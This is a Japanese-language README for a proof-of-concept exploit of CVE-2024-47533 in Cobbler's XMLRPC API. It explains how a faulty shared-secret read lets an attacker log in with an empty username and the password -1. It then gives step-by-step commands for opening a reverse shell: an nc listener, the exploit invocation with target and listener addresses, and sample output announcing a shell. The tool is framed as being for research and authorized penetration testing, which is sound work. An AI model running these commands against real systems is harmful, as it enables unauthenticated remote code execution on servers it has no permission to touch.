
CVE-2024-47533の概念実証エクスプロイト。CobblerのXMLRPC APIの認証バイパスにより、注入されたリバースシェルを介したリモートコード実行につながります。
このリポジトリは CVE-2024-47533 の 概念実証 (PoC) エクスプロイト です。
Cobbler の XMLRPC API における認証バイパスの脆弱性を悪用し、未認証のリモートコード実行 (RCE) に至ります。
このエクスプロイトは、XMLRPC API の login() メソッドの欠陥を利用して認証を回避し、background_import() を介してリバースシェルコマンドを注入します。
このツールは 教育、研究、および許可された侵入テストのみ を目的としています。
所有していないシステム、または明示的な書面による許可を得ていないシステムでは 使用しないでください。
作成者は誤用や損害について 一切の責任を負いません。
根本原因:
utils.get_shared_secret() が、バイナリモードでのファイル読み取りとエンコーディングの扱いの誤りにより -1 を返します。これにより、空のユーザー名とパスワード -1 で認証が可能になります。
影響:
攻撃者は以下のことが可能です。
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
攻撃マシン上で:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
例:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # Reverse shell exploit script
└── README.md # Documentation
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
00xCanelo
GitHub プロフィール